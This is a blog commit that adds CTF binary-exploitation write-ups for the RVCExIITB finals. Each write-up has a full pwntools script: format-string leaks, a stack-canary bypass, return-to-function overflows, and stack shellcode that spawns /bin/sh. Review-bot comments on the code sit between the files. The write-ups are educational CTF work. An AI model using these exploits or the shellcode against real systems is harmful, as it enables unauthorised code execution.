Writeup update
abhinavis2005 committed Jul 4, 2024
1 parent 5ce89dd commit 1925cb3
Showing 18 changed files with 595 additions and 2 deletions.
2 changes: 1 addition & 1 deletion config.toml
@@ -14,7 +14,7 @@ taxonomies = [
render_emoji = true
external_links_target_blank = true
smart_punctuation = true
highlight_code = false
highlight_code = true
highlight_theme = "gruvbox-dark"

[slugify]
1 change: 1 addition & 0 deletions content/writeups/RVCExIITBFinals/_index.md
@@ -4,5 +4,6 @@ paginate_path = "writeups/RVCExIITBFinals"
title = "RVCExIITB CTF"
sort_by = "date"
page_template = "blog-page.html"
redirect_to = "writeups/RVCExIITBFinals/writeup"
+++
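Review bot: `redirect_to = "writeups/RVCExIITBFinals/writeup"` points at a page that does not appear anywhere in this commit; the writeups added here live under `paranoid2/`, `paranoid3/` and `physicistquest/`, so unless a `writeup` page exists among the files not shown, the section index will redirect to a missing path. Also note that with `redirect_to` set, the section page becomes a redirect rather than the paginated list that `paginate_path`, `sort_by = "date"` and `page_template = "blog-page.html"` describe; if the intent is a list of the three new writeups, drop the redirect instead of adding it.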

148 changes: 148 additions & 0 deletions content/writeups/RVCExIITBFinals/paranoid2/index.md
@@ -0,0 +1,148 @@
+++
title = "Paranoid Part 2"
date = 2024-07-02
authors = ["Abhinav I S"]
+++

first, we will run checksec on the binary

```bash
checksec --file=challenge
```
<br>
{{ img(id="image1.png", alt="Alt Text", class="textCenter") }}

Opening the binary in a decompiler (Ghidra) and looking at main function gives

```c

void main(void)

{
undefined local_68 [48];
char local_38 [48];

banner();
puts(
"\nHey its Anonymous again...Someone leaked my temporary location to the FBI and they sent an agent to the location I provided them"
);
puts("\nIt\'s no longer safe to provide you the address of our temporary meeting point.");
puts("\nI\'m gonna have to hide and lay low for a while...");
puts("\nTry reaching out to me after things have settled down");
printf("\nGive me a name so that I can identify you if and when you contact me: ");
fflush(stdout);
read(0,local_38,0x23);
printf("\nAlright Mr. ");
printf(local_38);
printf(
"\nI\'ll look forward to doing business with you...Till then, is there anything that you wou ld like to convey? "
);
fflush(stdout);
read(0,local_68,0x110);
return;
}
```
Analyzing other functions,
there seems to be a suspicious function safe_house
```c
void safe_house(void)
{
char local_98 [136];
FILE *local_10;
local_10 = fopen("flag.txt","r");
if (local_10 == (FILE *)0x0) {
puts(
"\nThere is no \'flag.txt\' present in this directory. Please create sample flag for local e xploitation."
);
/* WARNING: Subroutine does not return */
exit(0);
}
fgets(local_98,0x80,local_10);
printf(local_98);
putchar(10);
fflush(stdout);
/* WARNING: Subroutine does not return */
exit(0);
}
```

clearly, we have to return to this function

there is a printf and two read function calls.
We can exploit a format string vulnereability to leak addresses from the stack, and calculate address of safe_house, since PIE is enabled

first step is to figure out the offset for the printf format string to print out addresses in the code section

starting the binary in gdb, and disassembling main, we find that addresses likely in the text section start with 0x5555555

<br>
{{ img(id="image2.png", alt="Alt Text", class="textCenter") }}

setting a break point at the first printf, and printing the stack

<br>
{{ img(id="image3.png", alt="Alt Text", class="textCenter") }}

we can see that %21$lx prints out the address of main

Next, we need to calculate the address of safe_house
from ghidra, we can see that the address of safe_house is 0x010125a,
and address of main is 0x0101316

So, address of win is main - 188

We can create our solve script, overflowing the buffer, RBP, into the return address

```python
#!/usr/bin/env python3

from pwn import *

exe = ELF("./challenge")

context.binary = exe
# context.log_level = "debug"

def conn():
if args.LOCAL:
r = process([exe.path])
if args.DEBUG:
gdb.attach(r)
else:
r = remote("rvcechalls.xyz", 27250)

return r


def main():
r = conn()
r.recv()
r.sendline(b"%21$lx")
data = r.recv()
lines = data.split(b"\n")
main = lines[1].split(b".")[1].lstrip(b" ")
print(main)
win = int(main,16) - 188
print(hex(win))
payload = b"A"*0x68 + p64(win+1)
r.sendline(payload)
print(r.recv())
r.interactive()




if __name__ == "__main__":
main()
```

giving the flag

```
flag{Mr_S0-c4ll3d_4n0nym0u5_ha5_l04d5ss_0F_53cUr1Ty_155u35_1907e55351f}
```
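Review bot: the `+1` in `p64(win+1)` is never explained; the text derives `win = main - 188` from the Ghidra addresses and then returns to `win+1`, so state why the extra byte is needed (presumably to skip the first instruction of `safe_house`'s prologue so the stack is 16-byte aligned when `fopen`/`printf` run, but the writeup should say what it is here) or readers will copy a magic offset. Two smaller points: the leak parsing `data = r.recv()` followed by `lines[1].split(b".")[1]` depends on a single `recv()` returning the whole "Alright Mr. <addr>" line, which is not guaranteed over the network; the Part 3 script already handles this with `r.recvuntil(b"better than ")`, so use the same pattern here (`r.recvuntil(b"Mr. ")` then `r.recvline()`). And `vulnereability` in the prose should read `vulnerability`.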

111 changes: 111 additions & 0 deletions content/writeups/RVCExIITBFinals/paranoid3/index.md
@@ -0,0 +1,111 @@
+++
title = "Paranoid Part 3"
date = 2024-07-04
authors = ["Abhinav I S"]
+++

First, we run checksec
<br>
{{ img(id="image1.png", alt="Alt Text", class="textCenter") }}

<br>

```c
void main(void)

{
long in_FS_OFFSET;
char local_68 [48];
undefined local_38 [40];
long local_10;

local_10 = *(long *)(in_FS_OFFSET + 0x28);
banner();
puts("\nOkay Its getting serious now. Somehow I now suck at hiding my actual address.");
puts("\nHence, I\'ve now decided to keep one of the strongest security guard on watch");
puts("\nHe will make sure that no one gets in and collects any evidence against me");
puts("\nHe\'s no ordinary guard I tell ya...The FBI fear him!");
printf("\nCan you guess who he is?: ");
fflush(stdout);
read(0,local_68,0x23);
printf("\nReally? you couldn\'t think of anyone better than ");
printf(local_68);
printf(
"\nTill we meet again then my old friend...Give me your final message. You will likely not s ee me now for a long time: "
);
fflush(stdout);
read(0,local_38,0x120);
if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
return;
}
```
looking at the other functions, there is a safe_house function which we need to return to. The difference from paranoid part 2 is the existence of [a stack canary](https://ctf101.org/binary-exploitation/stack-canaries/)
opening the binary in GDB, examining addresses of RBP, and the value that gets printed from the stack, we can calculate the offset to the canary, and the address of main
1. give input %7$lx, the value that gets printed out is 0
2. examine stack and value of rbp
<br>
{{ img(id="image2.png", alt="Alt Text", class="textCenter") }}
3. clearly the canary is at %17$lx and the address of main is at %21$lx
Now, we can write the solve script
```python
#!/usr/bin/env python3
from pwn import *
exe = ELF("./challenge")
context.binary = exe
context.log_level = "debug"
def conn():
if args.LOCAL:
r = process([exe.path])
if args.DEBUG:
gdb.attach(r)
else:
r = remote("rvcechalls.xyz", 33545)
return r
def main():
r = conn()
r.recv()
r.sendline(b"%17$lx.%21$lx")
data = r.recvuntil(b"better than ")
data = r.recv()
addresses = data.split(b"\n")[0]
canary = addresses.split(b".")[0]
main = addresses.split(b".")[1]
# r.recv()
win = int(main,16) - 211
payload = b"A"*0x28 + p64(int(canary,16 ))+ b"B"*8 + p64(win)
r.sendline(payload)
r.recv()
# good luck pwning :)
r.interactive()
if __name__ == "__main__":
main()
```

gives us the flag
<br>

```
flag{Th15_pUnY_6u4rd_aint_S70pp1n_m33_1907ebe25bf}
```
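Review bot: `win = int(main,16) - 211` appears with no derivation; Part 2 shows the Ghidra addresses of `main` and `safe_house` and computes the difference, so do the same here (211 cannot be checked from anything on the page). Related: step 1 of the GDB procedure ("give input %7$lx, the value that gets printed out is 0") is not connected to step 3; explain how that observation leads to `%17$lx` being the canary and `%21$lx` being `main`. A cheap sanity check worth adding to the script: a glibc stack canary on x86-64 always has a zero low byte, so `assert int(canary,16) & 0xff == 0` catches a wrong format-string offset before the payload is sent. Style: `context.log_level = "debug"` is left enabled here while it is commented out in the other two scripts, and Part 2 returned to `win+1` where this script returns to `win`; if the difference is intentional, a sentence on why would help.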
121 changes: 121 additions & 0 deletions content/writeups/RVCExIITBFinals/physicistquest/index.md
@@ -0,0 +1,121 @@
+++
title = "The Physicist's Quest"
date = 2024-07-04
authors = ["Abhinav I S"]
+++

First, we run checksec on the binary

```bash
checksec --file=challenge
```

<br>
{{ img(id="image1.png", alt="Alt Text", class="textCenter") }}

NX disabled indicates we can execute from stack, hence this is likely a shellcode injection challenge.

Now, opening in a decompiler (Ghidra):

```c

undefined8 main(void)

{
int local_70;
int local_6c;
undefined local_68 [92];
uint local_c;

fflush(stdout);
puts("Hi you know my buddy");
puts("He\'s stuck with his research on string theory");
puts(
"He\'s too proud to admit it, but he needs your help. But first you will need to prove that yo u are worthy enough for this"
);
puts("enter two magic numbers");
__isoc99_scanf(&DAT_001020e1,&local_6c);
__isoc99_scanf(&DAT_001020e1,&local_70);
if ((-1 < local_6c) && (-1 < local_70)) {
local_c = local_70 + local_6c;
printf("Your magic value is %d\n",(ulong)local_c);
if ((int)local_c < 0) {
puts(
"Good job! Now you need to figure out my location so that I can trick my friend into meeti ng you"
);
printf("Meet us in secrecy at %p\n",local_68);
read(0,local_68,200);
}
return 0;
}
printf("BAZINGA! Close but not close");
/* WARNING: Subroutine does not return */
exit(0);
}
```
ok , if local_6c and local_70 are positive and their sum is negative, we can write into a buffer, and the address of this buffer is printed out.
The first if conditions can be achieved by [Integer Overflow](https://en.wikipedia.org/wiki/Integer_overflow).
Now, we put shellcode in the buffer and overwrite the return address with the address of the buffer (the shellcode).
We can create our solve script:
```python
#!/usr/bin/env python3
from pwn import *
exe = ELF("./challenge")
context.binary = exe
# context.log_level = "debug"
def conn():
if args.LOCAL:
r = process([exe.path])
if args.DEBUG:
gdb.attach(r)
else:
r = remote("rvcechalls.xyz", 29639)
return r
def main():
shellcode = b"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\x0f\x05"
r = conn()
r.recv()
r.sendline(b"2147483645")
r.sendline(b"10")
data = r.recv()
print(data.split(b" ")[-1])
win = int(data.split(b" ")[-1], 16)
print(hex(win))
payload = shellcode + b"A"*(0x68-48) + p64(win)
# good luck pwning :)
r.sendline(payload)
r.interactive()
if __name__ == "__main__":
main()
```

note that we need an additional 0x68-48 bytes to reach the return address since the shellcode is 48 bytes long.
Shellcode was obtained from a [Shellcode Database](https://shell-storm.org/shellcode/index.html)

Running the script spawns a shell, and we can print out the flag

<br>
{{ img(id="image2.png", alt="Alt Text", class="textCenter") }}
<br>

```
flag{Gre4t_Y0u_h3lp4d_h1m_TBBT}
```
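Review bot: the 48-byte shellcode is pasted as a raw byte string with no comment on what it does; note in the text or the code that it is `setuid(0)` (`mov al,0x69; syscall`), then `execve("/bin/sh", ["/bin/sh"], NULL)` (`mov al,0x3b; syscall`), then `exit(1)`, or, since `context.binary = exe` is already set, generate an equivalent with `asm(shellcraft.sh())` so the reader can see the assembly instead of trusting opaque bytes. On the integer-overflow step, a one-line caveat is worth adding: signed overflow of `local_70 + local_6c` is undefined behaviour in C, and the exploit relies on the compiler having emitted a plain wrapping `add` before the `(int)local_c < 0` test, which is why `2147483645 + 10` works here. Minor: the note on `0x68-48` should say that the 0x68 covers the 92-byte buffer, `local_c` and the saved RBP up to the return address (92 + 4 + 8 = 0x68), the same 0x68 used in Part 2.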